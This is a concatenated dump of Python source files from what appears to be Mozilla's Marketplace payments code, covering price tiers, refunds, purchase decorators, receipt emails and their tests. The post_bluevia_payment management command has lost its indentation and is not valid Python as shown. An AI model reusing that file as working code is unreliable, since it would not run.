        params = [addon_id, since]
        # Hardcoded statuses for simplicity, but they are:
        # amo.REFUND_PENDING, amo.REFUND_APPROVED, amo.REFUND_APPROVED_INSTANT
        sql = '''
            SELECT COUNT(DISTINCT sc.user_id) AS num
            FROM refunds
            LEFT JOIN stats_contributions AS sc
                ON refunds.contribution_id = sc.id
            WHERE sc.addon_id = %s
            AND refunds.status IN (0,1,2)
            AND refunds.created > %s
        '''
        cursor.execute(sql, params)
        row = cursor.fetchone()
        if row:
            return row[0] / float(purchases)
        return 0.0
# Re-check refund escalations whenever a Refund row changes.
models.signals.post_save.connect(Refund.post_save, sender=Refund)
class AddonPaymentData(ModelBase):
    """Payee contact/address details captured for a paid add-on."""
    # Store information about the app. This can be entered manually
    # or got from PayPal. At the moment, I'm just capturing absolutely
    # everything from PayPal and that's what these fields are.
    # Easier to do this and clean out later.
    # See: http://bit.ly/xy5BTs and http://bit.ly/yRYbRx
    #
    # I've no idea what the biggest lengths of these are, so making
    # up some aribtrary lengths.
    addon = models.OneToOneField('addons.Addon', related_name='payment_data')
    # Basic.
    first_name = models.CharField(max_length=255, blank=True)
    last_name = models.CharField(max_length=255, blank=True)
    email = models.EmailField(blank=True)
    full_name = models.CharField(max_length=255, blank=True)
    business_name = models.CharField(max_length=255, blank=True)
    country = models.CharField(max_length=64)
    payerID = models.CharField(max_length=255, blank=True)
    # Advanced.
    address_one = models.CharField(max_length=255)
    address_two = models.CharField(max_length=255, blank=True)
    post_code = models.CharField(max_length=128, blank=True)
    city = models.CharField(max_length=128, blank=True)
    state = models.CharField(max_length=64, blank=True)
    phone = models.CharField(max_length=32, blank=True)
    class Meta:
        db_table = 'addon_payment_data'
    @classmethod
    def address_fields(cls):
        """Names of all text-like fields (every Char/Email field above)."""
        return [field.name for field in cls._meta.fields
                if isinstance(field, (models.CharField, models.EmailField))]
    def __unicode__(self):
        return u'%s: %s' % (self.pk, self.addon)
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from constants.payments import PROVIDER_LOOKUP
from mkt.prices.models import Price, price_locale
class PriceSerializer(serializers.ModelSerializer):
    """Serializes a Price tier with all its regional price variants."""
    prices = serializers.SerializerMethodField('get_prices')
    localized = serializers.SerializerMethodField('get_localized_prices')
    pricePoint = serializers.CharField(source='name')
    name = serializers.CharField(source='tier_name')
    class Meta:
        model = Price
    def get_prices(self, obj):
        # Optional ?provider= query param narrows prices to one provider.
        provider = self.context['request'].GET.get('provider', None)
        if provider:
            provider = PROVIDER_LOOKUP[provider]
        return obj.prices(provider=provider)
    def get_localized_prices(self, obj):
        """Return the price dict for the request's region, with a
        locale-formatted price string, or {} when the region has none."""
        region = self.context['request'].REGION
        for price in self.get_prices(obj):
            if price['region'] == region.id:
                result = price.copy()
                result.update({
                    'locale': price_locale(price['price'], price['currency']),
                    'region': region.name,
                })
                return result
        return {}
########NEW FILE########
__FILENAME__ = test_models
import datetime
from decimal import Decimal
from django.utils import translation
import mock
from nose.tools import eq_, ok_
import amo
import amo.tests
from addons.models import AddonUser
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from mkt.constants import apps
from mkt.constants.regions import (ALL_REGION_IDS, BR, HU,
SPAIN, UK, US, RESTOFWORLD)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import AddonPremium, Price, PriceCurrency, Refund
from stats.models import Contribution
from users.models import UserProfile
class TestPremium(amo.tests.TestCase):
    """Tests for AddonPremium.is_complete()."""
    fixtures = fixture('prices2', 'webapp_337141')
    def setUp(self):
        self.tier_one = Price.objects.get(pk=1)
        self.addon = Webapp.objects.get(pk=337141)
    def test_is_complete(self):
        # Incomplete until support email, price and paypal_id are all set.
        self.addon.support_email = '[email protected]'
        ap = AddonPremium(addon=self.addon)
        assert not ap.is_complete()
        ap.price = self.tier_one
        assert not ap.is_complete()
        ap.addon.paypal_id = 'asd'
        assert ap.is_complete()
class TestPrice(amo.tests.TestCase):
    """Tests for the Price model: lookups, localization, regions, providers."""
    fixtures = fixture('prices2')
    def setUp(self):
        self.tier_one = Price.objects.get(pk=1)
        if hasattr(Price, '_currencies'):
            del Price._currencies  # needed to pick up fixtures.
    def test_active(self):
        eq_(Price.objects.count(), 2)
        eq_(Price.objects.active().count(), 1)
    def test_active_order(self):
        # active() must return tiers sorted by ascending price.
        Price.objects.create(name='USD', price='0.00')
        Price.objects.create(name='USD', price='1.99')
        eq_(list(Price.objects.active().values_list('price', flat=True)),
            [Decimal('0.00'), Decimal('0.99'), Decimal('1.99')])
    def test_method_default_all(self):
        price = Price.objects.create(name='USD', price='0.00')
        eq_(price.method, 2)
    def test_method_specified(self):
        price = Price.objects.create(name='USD', price='0.99', method=0)
        eq_(price.method, 0)
    def test_currency(self):
        eq_(self.tier_one.pricecurrency_set.count(), 3)
    def test_get(self):
        eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
    def test_get_tier(self):
        translation.activate('en_CA')
        eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
        eq_(Price.objects.get(pk=1).get_price_locale(), u'US$0.99')
    def test_get_tier_and_locale(self):
        translation.activate('pt_BR')
        eq_(Price.objects.get(pk=2).get_price(), Decimal('1.99'))
        eq_(Price.objects.get(pk=2).get_price_locale(), u'US$1,99')
    def test_no_region(self):
        # A region with no PriceCurrency yields None.
        eq_(Price.objects.get(pk=2).get_price_locale(region=HU.id), None)
    def test_fallback(self):
        translation.activate('foo')
        eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
        eq_(Price.objects.get(pk=1).get_price_locale(), u'$0.99')
    def test_transformer(self):
        price = Price.objects.get(pk=1)
        price.get_price_locale()
        # Warm up Price._currencies.
        with self.assertNumQueries(0):
            eq_(price.get_price_locale(), u'$0.99')
    def test_get_tier_price(self):
        eq_(Price.objects.get(pk=2).get_price_locale(region=BR.id), 'R$1.01')
    def test_get_tier_price_provider(self):
        # Because we specify Boku, there is no tier to be found.
        eq_(Price.objects.get(pk=2)
            .get_price_locale(region=BR.id, provider=PROVIDER_BOKU), None)
        # Turning on Boku will give us the tier.
        PriceCurrency.objects.get(pk=3).update(provider=PROVIDER_BOKU)
        eq_(Price.objects.get(pk=2)
            .get_price_locale(region=BR.id, provider=PROVIDER_BOKU), 'R$1.01')
    def test_get_free_tier_price(self):
        price = self.make_price('0.00')
        eq_(price.get_price_locale(region=US.id), '$0.00')
    def test_euro_placement(self):
        # Euro symbol position depends on the active language.
        with self.activate('en-us'):
            eq_(Price.objects.get(pk=2).get_price_locale(region=SPAIN.id),
                u'\u20ac0.50')
        with self.activate('es'):
            eq_(Price.objects.get(pk=2).get_price_locale(region=SPAIN.id),
                u'0,50\xa0\u20ac')
    def test_prices(self):
        currencies = Price.objects.get(pk=1).prices()
        eq_(len(currencies), 2)
        eq_(currencies[0]['currency'], 'PLN')
    def test_wrong_currency(self):
        bad = 4999
        ok_(bad not in ALL_REGION_IDS)
        ok_(not Price.objects.get(pk=1).get_price('foo', region=bad))
    def test_prices_provider(self):
        currencies = Price.objects.get(pk=1).prices(provider=PROVIDER_BANGO)
        eq_(len(currencies), 2)
    def test_multiple_providers(self):
        PriceCurrency.objects.get(pk=2).update(provider=PROVIDER_BOKU)
        # This used to be 0, so changing it to 3 puts in scope of the filter.
        with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
            currencies = Price.objects.get(pk=1).prices()
            eq_(len(currencies), 3)
    def test_region_ids_by_name_multi_provider(self):
        with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
            eq_(Price.objects.get(pk=2).region_ids_by_name(),
                [BR.id, SPAIN.id, UK.id, RESTOFWORLD.id])
    def test_region_ids_by_name(self):
        eq_(Price.objects.get(pk=2).region_ids_by_name(),
            [BR.id, SPAIN.id, RESTOFWORLD.id])
    def test_region_ids_by_name_w_provider_boku(self):
        eq_(Price.objects.get(pk=2).region_ids_by_name(
            provider=PROVIDER_BOKU), [UK.id])
    def test_region_ids_by_name_w_provider_bango(self):
        eq_(Price.objects.get(pk=2).region_ids_by_name(
            provider=PROVIDER_BANGO), [BR.id, SPAIN.id, RESTOFWORLD.id])
    def test_provider_regions(self):
        with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
            eq_(Price.objects.get(pk=2).provider_regions(), {
                PROVIDER_BANGO: [BR, SPAIN, RESTOFWORLD],
                PROVIDER_BOKU: [UK]})
    def test_provider_regions_boku(self):
        with self.settings(PAYMENT_PROVIDERS=['boku']):
            eq_(Price.objects.get(pk=2).provider_regions(), {
                PROVIDER_BOKU: [UK]})
    def test_provider_regions_bango(self):
        with self.settings(PAYMENT_PROVIDERS=['bango']):
            eq_(Price.objects.get(pk=2).provider_regions(), {
                PROVIDER_BANGO: [BR, SPAIN, RESTOFWORLD]})
class TestPriceCurrencyChanges(amo.tests.TestCase):
    """PriceCurrency save/delete must trigger re-indexing of its apps."""
    def setUp(self):
        self.addon = amo.tests.addon_factory()
        self.make_premium(self.addon)
        self.currency = self.addon.premium.price.pricecurrency_set.all()[0]
    @mock.patch('mkt.webapps.tasks.index_webapps')
    def test_save(self, index_webapps):
        self.currency.save()
        eq_(index_webapps.delay.call_args[0][0], [self.addon.pk])
    @mock.patch('mkt.webapps.tasks.index_webapps')
    def test_delete(self, index_webapps):
        self.currency.delete()
        eq_(index_webapps.delay.call_args[0][0], [self.addon.pk])
class ContributionMixin(object):
    """Shared helpers for tests that create Contribution rows."""
    def setUp(self):
        self.addon = Webapp.objects.get(pk=337141)
        self.user = UserProfile.objects.get(pk=999)
    def create(self, type):
        """Create a Contribution of the given type for self.addon/self.user."""
        return Contribution.objects.create(type=type, addon=self.addon,
                                           user=self.user)
    def purchased(self):
        """True when the user currently has a purchase-typed AddonPurchase."""
        return (self.addon.addonpurchase_set
                    .filter(user=self.user, type=amo.CONTRIB_PURCHASE)
                    .exists())
    def type(self):
        """Return the current AddonPurchase type for the user."""
        return self.addon.addonpurchase_set.get(user=self.user).type
class TestContribution(ContributionMixin, amo.tests.TestCase):
    """Tests for the create_addon_purchase signal handler semantics."""
    fixtures = fixture('webapp_337141', 'user_999', 'user_admin')
    def test_purchase(self):
        self.create(amo.CONTRIB_PURCHASE)
        assert self.purchased()
    def test_refund(self):
        self.create(amo.CONTRIB_REFUND)
        assert not self.purchased()
    def test_purchase_and_refund(self):
        self.create(amo.CONTRIB_PURCHASE)
        self.create(amo.CONTRIB_REFUND)
        assert not self.purchased()
        eq_(self.type(), amo.CONTRIB_REFUND)
    def test_refund_and_purchase(self):
        # This refund does nothing, there was nothing there to refund.
        self.create(amo.CONTRIB_REFUND)
        self.create(amo.CONTRIB_PURCHASE)
        assert self.purchased()
        eq_(self.type(), amo.CONTRIB_PURCHASE)
    def test_really_cant_decide(self):
        # The latest contribution always wins.
        self.create(amo.CONTRIB_PURCHASE)
        self.create(amo.CONTRIB_REFUND)
        self.create(amo.CONTRIB_PURCHASE)
        self.create(amo.CONTRIB_REFUND)
        self.create(amo.CONTRIB_PURCHASE)
        assert self.purchased()
        eq_(self.type(), amo.CONTRIB_PURCHASE)
    def test_purchase_and_chargeback(self):
        self.create(amo.CONTRIB_PURCHASE)
        self.create(amo.CONTRIB_CHARGEBACK)
        assert not self.purchased()
        eq_(self.type(), amo.CONTRIB_CHARGEBACK)
    def test_other_user(self):
        # One user's refund must not touch another user's purchase.
        other = UserProfile.objects.get(email='[email protected]')
        Contribution.objects.create(type=amo.CONTRIB_PURCHASE,
                                    addon=self.addon, user=other)
        self.create(amo.CONTRIB_PURCHASE)
        self.create(amo.CONTRIB_REFUND)
        eq_(self.addon.addonpurchase_set.filter(user=other).count(), 1)
    def set_role(self, role):
        # Helper: purchasing as an author must record a developer install.
        AddonUser.objects.create(addon=self.addon, user=self.user, role=role)
        self.create(amo.CONTRIB_PURCHASE)
        installed = self.user.installed_set.filter(addon=self.addon)
        eq_(installed.count(), 1)
        eq_(installed[0].install_type, apps.INSTALL_TYPE_DEVELOPER)
    def test_user_dev(self):
        self.set_role(amo.AUTHOR_ROLE_DEV)
    def test_user_owner(self):
        self.set_role(amo.AUTHOR_ROLE_OWNER)
    def test_user_installed_dev(self):
        self.create(amo.CONTRIB_PURCHASE)
        eq_(self.user.installed_set.filter(addon=self.addon).count(), 1)
    def test_user_not_purchased(self):
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        eq_(list(self.user.purchase_ids()), [])
    def test_user_purchased(self):
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        self.addon.addonpurchase_set.create(user=self.user)
        eq_(list(self.user.purchase_ids()), [337141L])
    def test_user_refunded(self):
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        self.addon.addonpurchase_set.create(user=self.user,
                                            type=amo.CONTRIB_REFUND)
        eq_(list(self.user.purchase_ids()), [])
    def test_user_cache(self):
        # Tests that the purchase_ids caches.
        self.addon.update(premium_type=amo.ADDON_PREMIUM)
        eq_(list(self.user.purchase_ids()), [])
        self.create(amo.CONTRIB_PURCHASE)
        eq_(list(self.user.purchase_ids()), [337141L])
        # This caches.
        eq_(list(self.user.purchase_ids()), [337141L])
        self.create(amo.CONTRIB_REFUND)
        eq_(list(self.user.purchase_ids()), [])
class TestRefundContribution(ContributionMixin, amo.tests.TestCase):
    """Tests for Contribution.enqueue_refund state transitions."""
    fixtures = fixture('webapp_337141', 'user_999', 'user_admin')
    def setUp(self):
        super(TestRefundContribution, self).setUp()
        self.contribution = self.create(amo.CONTRIB_PURCHASE)
    def do_refund(self, expected, status, refund_reason=None,
                  rejection_reason=None):
        """Checks that a refund is enqueued and contains the correct values."""
        self.contribution.enqueue_refund(status, self.user,
                                         refund_reason=refund_reason,
                                         rejection_reason=rejection_reason)
        expected.update(contribution=self.contribution, status=status)
        eq_(Refund.objects.count(), 1)
        refund = Refund.objects.filter(**expected)
        eq_(refund.exists(), True)
        return refund[0]
    def test_pending(self):
        reason = 'this is bloody bullocks, mate'
        expected = dict(refund_reason=reason,
                        requested__isnull=False,
                        approved=None,
                        declined=None)
        refund = self.do_refund(expected, amo.REFUND_PENDING, reason)
        self.assertCloseToNow(refund.requested)
    def test_pending_to_approved(self):
        reason = 'this is bloody bullocks, mate'
        expected = dict(refund_reason=reason,
                        requested__isnull=False,
                        approved=None,
                        declined=None)
        refund = self.do_refund(expected, amo.REFUND_PENDING, reason)
        self.assertCloseToNow(refund.requested)
        # Change `requested` date to some date in the past.
        requested_date = refund.requested - datetime.timedelta(hours=1)
        refund.requested = requested_date
        refund.save()
        expected = dict(refund_reason=reason,
                        requested__isnull=False,
                        approved__isnull=False,
                        declined=None)
        refund = self.do_refund(expected, amo.REFUND_APPROVED)
        eq_(refund.requested, requested_date,
            'Expected date `requested` to remain unchanged.')
        self.assertCloseToNow(refund.approved)
    def test_approved_instant(self):
        # Instant approval sets both requested and approved immediately.
        expected = dict(refund_reason='',
                        requested__isnull=False,
                        approved__isnull=False,
                        declined=None)
        refund = self.do_refund(expected, amo.REFUND_APPROVED_INSTANT)
        self.assertCloseToNow(refund.requested)
        self.assertCloseToNow(refund.approved)
    def test_pending_to_declined(self):
        refund_reason = 'please, bro'
        rejection_reason = 'sorry, brah'
        expected = dict(refund_reason=refund_reason,
                        rejection_reason='',
                        requested__isnull=False,
                        approved=None,
                        declined=None)
        refund = self.do_refund(expected, amo.REFUND_PENDING, refund_reason)
        self.assertCloseToNow(refund.requested)
        requested_date = refund.requested - datetime.timedelta(hours=1)
        refund.requested = requested_date
        refund.save()
        expected = dict(refund_reason=refund_reason,
                        rejection_reason=rejection_reason,
                        requested__isnull=False,
                        approved=None,
                        declined__isnull=False)
        refund = self.do_refund(expected, amo.REFUND_DECLINED,
                                rejection_reason=rejection_reason)
        eq_(refund.requested, requested_date,
            'Expected date `requested` to remain unchanged.')
        self.assertCloseToNow(refund.declined)
class TestRefundManager(amo.tests.TestCase):
    """Exercise the custom Refund manager's status-filtering querysets."""
    fixtures = fixture('webapp_337141', 'user_999', 'user_admin')

    def setUp(self):
        # Create one contribution + refund per refund status, keyed by
        # status, so each filter method has exactly one expected match.
        self.addon = Webapp.objects.get(id=337141)
        self.user = UserProfile.objects.get(id=999)
        self.expected = {}
        for status in amo.REFUND_STATUSES.keys():
            c = Contribution.objects.create(addon=self.addon, user=self.user,
                                            type=amo.CONTRIB_PURCHASE)
            self.expected[status] = Refund.objects.create(contribution=c,
                                                          status=status,
                                                          user=self.user)

    def test_all(self):
        eq_(sorted(Refund.objects.values_list('id', flat=True)),
            sorted(e.id for e in self.expected.values()))

    def test_pending(self):
        eq_(list(Refund.objects.pending(self.addon)),
            [self.expected[amo.REFUND_PENDING]])

    def test_approved(self):
        eq_(list(Refund.objects.approved(self.addon)),
            [self.expected[amo.REFUND_APPROVED]])

    def test_instant(self):
        eq_(list(Refund.objects.instant(self.addon)),
            [self.expected[amo.REFUND_APPROVED_INSTANT]])

    def test_declined(self):
        eq_(list(Refund.objects.declined(self.addon)),
            [self.expected[amo.REFUND_DECLINED]])

    def test_by_addon(self):
        # A refund tied to a different app must not leak into by_addon()
        # results for self.addon, and vice versa.
        other = Webapp.objects.create()
        c = Contribution.objects.create(addon=other, user=self.user,
                                        type=amo.CONTRIB_PURCHASE)
        ref = Refund.objects.create(contribution=c, status=amo.REFUND_DECLINED,
                                    user=self.user)
        declined = Refund.objects.filter(status=amo.REFUND_DECLINED)
        eq_(sorted(r.id for r in declined),
            sorted(r.id for r in [self.expected[amo.REFUND_DECLINED], ref]))
        eq_(sorted(r.id for r in Refund.objects.by_addon(addon=self.addon)),
            sorted(r.id for r in self.expected.values()))
        eq_(list(Refund.objects.by_addon(addon=other)), [ref])
########NEW FILE########
__FILENAME__ = test_utils
from StringIO import StringIO
from nose.tools import eq_
import amo.tests
from mkt.prices.models import Price, PriceCurrency
from mkt.prices.utils import update, update_from_csv
# Sample input rows for update(): each dict maps currency code -> price
# string. The 'USD' value identifies the Price tier a row belongs to.
tiers = [
    {'USD': '0.99', 'BRL': '1.99'},
    # This row should be ignored, no tier of value 3.
    {'USD': '3.00'},
    # This row should be ignored, not US tier.
    {'CAD': '10'}
]
# Tab-separated input for update_from_csv(); the first line is the header
# row of currency codes. (Note: this local name shadows nothing -- the csv
# module is not imported in this test file.)
csv = StringIO("""USD\tCAD\tBRL\n0.99\t1.99\t1.00""")
class TestUpdate(amo.tests.TestCase):
    """Tests for mkt.prices.utils.update / update_from_csv."""

    def setUp(self):
        # The only existing tier; matches the '0.99' USD value in `tiers`.
        self.tier = Price.objects.create(name='1', price='0.99')

    def test_create(self):
        update(tiers)
        eq_(str(PriceCurrency.objects.get(currency='BRL').price), '1.99')
        # The CAD-only row has no USD tier to attach to, so it is skipped.
        assert not PriceCurrency.objects.filter(currency='CAD').exists()

    def test_update(self):
        # An existing PriceCurrency is overwritten, not duplicated.
        PriceCurrency.objects.create(currency='BRL', tier=self.tier, price='2')
        update(tiers)
        eq_(str(PriceCurrency.objects.get(currency='BRL').price), '1.99')

    def test_csv(self):
        update_from_csv(csv)
        assert PriceCurrency.objects.filter(currency='CAD').exists()
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from rest_framework import routers
from mkt.prices.views import PricesViewSet
# Read-only API endpoints for price tiers: /prices/ and /prices/<pk>/.
api = routers.SimpleRouter()
api.register(r'prices', PricesViewSet)

urlpatterns = patterns(
    '',
    url(r'^', include(api.urls)),
)
########NEW FILE########
__FILENAME__ = utils
import csv
from decimal import Decimal
from mkt.prices.models import Price, PriceCurrency
def update(tiers):
    """
    Sync PriceCurrency rows from a list of tier dictionaries.

    Each entry in `tiers` maps currency codes to price strings. The 'USD'
    value is required so that we can look up the Price tier; rows without
    one, or whose tier does not exist, are skipped entirely. For every
    other currency in a row, the matching PriceCurrency is updated, or
    created if missing.

    Intended to be called via a migration or other command. Returns a list
    of human-readable messages describing what happened.
    """
    messages = []
    for row in tiers:
        usd_price = row.get('USD')
        if not usd_price:
            messages.append('No USD in row, skipped')
            continue
        try:
            tier = Price.objects.get(price=Decimal(usd_price))
        except Price.DoesNotExist:
            messages.append('Tier not found, skipping: %s' % usd_price)
            continue
        for currency, value in row.items():
            if currency == 'USD':
                continue
            try:
                price_currency = PriceCurrency.objects.get(tier=tier,
                                                           currency=currency)
            except PriceCurrency.DoesNotExist:
                # No existing row for this tier/currency: create one.
                price_currency = PriceCurrency(tier=tier, currency=currency)
            price_currency.price = Decimal(value)
            price_currency.save()
            messages.append('Currency updated: %s, %s, tier %s' %
                            (currency, value, usd_price))
    return messages
def update_from_csv(handle):
    """
    Parse a tab-separated file object into tier dictionaries and hand them
    to update(). The first (non-empty) row is treated as the header of
    currency codes; every subsequent row is zipped against it.
    """
    reader = csv.reader(handle, delimiter='\t')
    header = []
    parsed_rows = []
    for record in reader:
        if header:
            parsed_rows.append(dict(zip(header, record)))
        else:
            # First row (or first non-empty row) becomes the header.
            header = record
    return update(parsed_rows)
########NEW FILE########
__FILENAME__ = views
import django_filters
from rest_framework.mixins import RetrieveModelMixin, ListModelMixin
from rest_framework.permissions import AllowAny
from rest_framework.viewsets import GenericViewSet
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.prices.models import Price
from mkt.prices.serializers import PriceSerializer
from mkt.api.authentication import RestAnonymousAuthentication
class PriceFilter(django_filters.FilterSet):
    # Expose the Price model's `name` field under the public query
    # parameter `pricePoint`, e.g. /prices/?pricePoint=1.
    pricePoint = django_filters.CharFilter(name="name")

    class Meta:
        model = Price
        fields = ['pricePoint']
class PricesViewSet(MarketplaceView, CORSMixin, ListModelMixin,
                    RetrieveModelMixin, GenericViewSet):
    """Anonymous, read-only (list/retrieve) API over active price tiers,
    ordered by ascending price and filterable via ?pricePoint=<name>."""
    queryset = Price.objects.filter(active=True).order_by('price')
    serializer_class = PriceSerializer
    cors_allowed_methods = ['get']
    authentication_classes = [RestAnonymousAuthentication]
    permission_classes = [AllowAny]
    filter_class = PriceFilter
########NEW FILE########
__FILENAME__ = decorators
import functools
from django.core.exceptions import PermissionDenied
import commonware.log
log = commonware.log.getLogger('mkt.purchase')
def can_become_premium(f):
    """Decorator: only run the view if the webapp can become premium.

    The wrapped view must take (request, addon_id, addon, ...). Raises
    PermissionDenied otherwise.
    """
    @functools.wraps(f)
    def wrapper(request, addon_id, addon, *args, **kw):
        if addon.can_become_premium():
            return f(request, addon_id, addon, *args, **kw)
        log.info('Cannot become premium: %d' % addon.pk)
        raise PermissionDenied
    return wrapper
def can_be_purchased(f):
    """
    Decorator: reject the view with PermissionDenied unless the addon can
    be purchased (returns False if not premium).
    Must be called after the addon_view decorator.
    """
    @functools.wraps(f)
    def wrapper(request, addon, *args, **kw):
        if addon.can_be_purchased():
            return f(request, addon, *args, **kw)
        log.info('Cannot be purchased: %d' % addon.pk)
        raise PermissionDenied
    return wrapper
def has_purchased(f):
    """
    Decorator: for premium addons, require that the current user has
    already purchased it; free addons always pass through.
    Must be called after addon_view decorator.
    """
    @functools.wraps(f)
    def wrapper(request, addon, *args, **kw):
        premium_and_unpaid = (addon.is_premium() and
                              not addon.has_purchased(request.amo_user))
        if premium_and_unpaid:
            log.info('Not purchased: %d' % addon.pk)
            raise PermissionDenied
        return f(request, addon, *args, **kw)
    return wrapper
########NEW FILE########
__FILENAME__ = post_bluevia_payment
import calendar
from optparse import make_option
import time
from urllib import urlencode
from django.core.management.base import BaseCommand
import jwt
import requests
class Command(BaseCommand):
help = 'Simulate a BlueVia postback to mark a payment as complete.'
option_list = BaseCommand.option_list + (
make_option('--trans-id', action='store',
help='BlueVia transaction ID', default='1234'),
make_option('--secret', action='store',
help='Marketplace secret for signature verification'),
make_option('--contrib', action='store',
help='Contribution UUID'),
make_option('--addon', action='store',
help='ID of addon that was purchased'),
make_option('--url', action='store',
help='Postback URL. Default: %default',
default='http://localhost:8001/services/bluevia/postback'),
)
def handle(self, *args, **options):
assert 'contrib' in options, 'require --contrib'
assert 'addon' in options, 'require --addon'
issued_at = calendar.timegm(time.gmtime())
prod_data = urlencode({'contrib_uuid': options['contrib'],
'addon_id': options['addon']})
purchase = {'iss': 'tu.com',
'aud': 'marketplace.mozilla.org',
'typ': 'tu.com/payments/inapp/v1',
'iat': issued_at,
'exp': issued_at + 3600, # expires in 1 hour
'request': {
'name': 'Simulated Product',
'description': 'Simulated Product Description',
'price': '0.99',
'currencyCode': 'USD',
'productData': prod_data},
'response': {
'transactionID': options['trans_id']
}}
purchase_jwt = jwt.encode(purchase, options['secret'])
print 'posting JWT to %s' % options['url']
res = requests.post(options['url'], purchase_jwt, timeout=5)
res.raise_for_status()
print 'OK'
########NEW FILE########
__FILENAME__ = tasks
import logging
from celeryutils import task
from jingo.helpers import datetime
from tower import ugettext as _
from amo.helpers import absolutify
from amo.utils import get_locale_from_lang, send_html_mail_jinja
from stats.models import Contribution
log = logging.getLogger('z.purchase.webpay')
# Retry policy for notification tasks (15s delay between retries).
# NOTE(review): not referenced by the task below -- presumably splatted
# into a @task(**notify_kw) elsewhere; confirm it is still used.
notify_kw = dict(default_retry_delay=15,  # seconds
                 max_tries=5)
@task
def send_purchase_receipt(contrib_id, **kw):
    """
    Sends an email to the purchaser of the app.

    `contrib_id` is the pk of the Contribution recording the purchase.
    The whole email is rendered inside the purchaser's language context
    (activate_lang), and the price is localized to the locale the purchase
    was made in (source_locale).
    """
    contrib = Contribution.objects.get(pk=contrib_id)
    with contrib.user.activate_lang():
        addon = contrib.addon
        version = addon.current_version or addon.latest_version
        # L10n: {0} is the app name.
        subject = _('Receipt for {0}').format(contrib.addon.name)
        data = {
            'app_name': addon.name,
            # Apps with no version at all have no developer name to show.
            'developer_name': version.developer_name if version else '',
            'price': contrib.get_amount_locale(get_locale_from_lang(
                contrib.source_locale)),
            'date': datetime(contrib.created.date()),
            'purchaser_email': contrib.user.email,
            #'purchaser_phone': '',  # TODO: See bug 894614.
            #'purchaser_last_four': '',
            'transaction_id': contrib.uuid,
            'purchases_url': absolutify('/purchases'),
            'support_url': addon.support_url,
            'terms_of_service_url': absolutify('/terms-of-use'),
        }
        log.info('Sending email about purchase: %s' % contrib_id)
        text_template = 'purchase/receipt.ltxt'
        html_template = 'purchase/receipt.html'
        send_html_mail_jinja(subject, html_template, text_template, data,
                             recipient_list=[contrib.user.email])
########NEW FILE########
__FILENAME__ = test_webpay
import calendar
import json
import time
from decimal import Decimal
from django.conf import settings
from django.core.urlresolvers import reverse
import fudge
import jwt
import mock
from mock import ANY
from mozpay.exc import RequestExpired
from nose.tools import eq_, raises
import amo
from mkt.api.exceptions import AlreadyPurchased
from mkt.prices.models import AddonPurchase
from stats.models import Contribution
from utils import PurchaseTest
class TestWebAppPurchase(PurchaseTest):
    """View tests for starting a webpay app purchase (prepare_pay) and
    polling its status (pay_status)."""

    def setUp(self):
        super(TestWebAppPurchase, self).setUp()
        self.create_flag(name='solitude-payments')
        self.prepare_pay = reverse('webpay.prepare_pay',
                                   kwargs={'app_slug': self.addon.app_slug})

    def _req(self, method, url):
        # Issue a request and return the decoded JSON body, asserting a
        # successful JSON response on the way.
        req = getattr(self.client, method)
        resp = req(url)
        eq_(resp.status_code, 200)
        eq_(resp['content-type'], 'application/json')
        return json.loads(resp.content)

    def get(self, url, **kw):
        return self._req('get', url, **kw)

    def post(self, url, **kw):
        return self._req('post', url, **kw)

    def test_pay_status(self):
        uuid = '<returned from prepare-pay>'
        contribution = Contribution.objects.create(addon_id=self.addon.id,
                                                   amount=self.price.price,
                                                   uuid=uuid,
                                                   type=amo.CONTRIB_PENDING,
                                                   user=self.user)
        data = self.get(reverse('webpay.pay_status',
                                args=[self.addon.app_slug, uuid]))
        eq_(data['status'], 'incomplete')
        # Status flips to complete once the contribution is a purchase.
        contribution.update(type=amo.CONTRIB_PURCHASE)
        data = self.get(reverse('webpay.pay_status',
                                args=[self.addon.app_slug, uuid]))
        eq_(data['status'], 'complete')

    def test_status_for_purchases_only(self):
        # A different logged-in user must not see this purchase complete.
        uuid = '<returned from prepare-pay>'
        Contribution.objects.create(addon_id=self.addon.id,
                                    amount=self.price.price,
                                    uuid=uuid,
                                    type=amo.CONTRIB_PURCHASE,
                                    user=self.user)
        self.client.logout()
        assert self.client.login(username='[email protected]',
                                 password='password')
        data = self.get(reverse('webpay.pay_status',
                                args=[self.addon.app_slug, uuid]))
        eq_(data['status'], 'incomplete')

    def test_pay_status_for_unknown_contrib(self):
        data = self.get(reverse('webpay.pay_status',
                                args=[self.addon.app_slug, '<garbage>']))
        eq_(data['status'], 'incomplete')

    def test_strip_html(self):
        # The JWT's description must be plain text, with HTML stripped.
        self.addon.description = 'Some <a href="http://soso.com">site</a>'
        self.addon.save()
        data = self.post(self.prepare_pay)
        data = jwt.decode(data['webpayJWT'].encode('ascii'), verify=False)
        req = data['request']
        eq_(req['description'], 'Some site')

    def test_status_for_already_purchased(self):
        AddonPurchase.objects.create(addon=self.addon,
                                     user=self.user,
                                     type=amo.CONTRIB_PURCHASE)
        with self.assertRaises(AlreadyPurchased):
            self.client.post(self.prepare_pay)

    def test_require_login(self):
        self.client.logout()
        resp = self.client.post(self.prepare_pay)
        self.assertLoginRequired(resp)
@mock.patch.object(settings, 'SOLITUDE_HOSTS', ['host'])
@mock.patch('mkt.purchase.webpay.tasks')
class TestPostback(PurchaseTest):
    """Tests for the webpay postback endpoint.

    The class-level mock of `mkt.purchase.webpay.tasks` is injected into
    every test method as the trailing `tasks` argument.
    """

    def setUp(self):
        super(TestPostback, self).setUp()
        self.client.logout()
        # A pending contribution that a valid postback should mark paid.
        self.contrib = Contribution.objects.create(
            addon_id=self.addon.id,
            amount=self.price.price,
            uuid='<some uuid>',
            type=amo.CONTRIB_PENDING,
            user=self.user
        )
        self.webpay_dev_id = '<stored in solitude>'
        self.webpay_dev_secret = '<stored in solitude>'

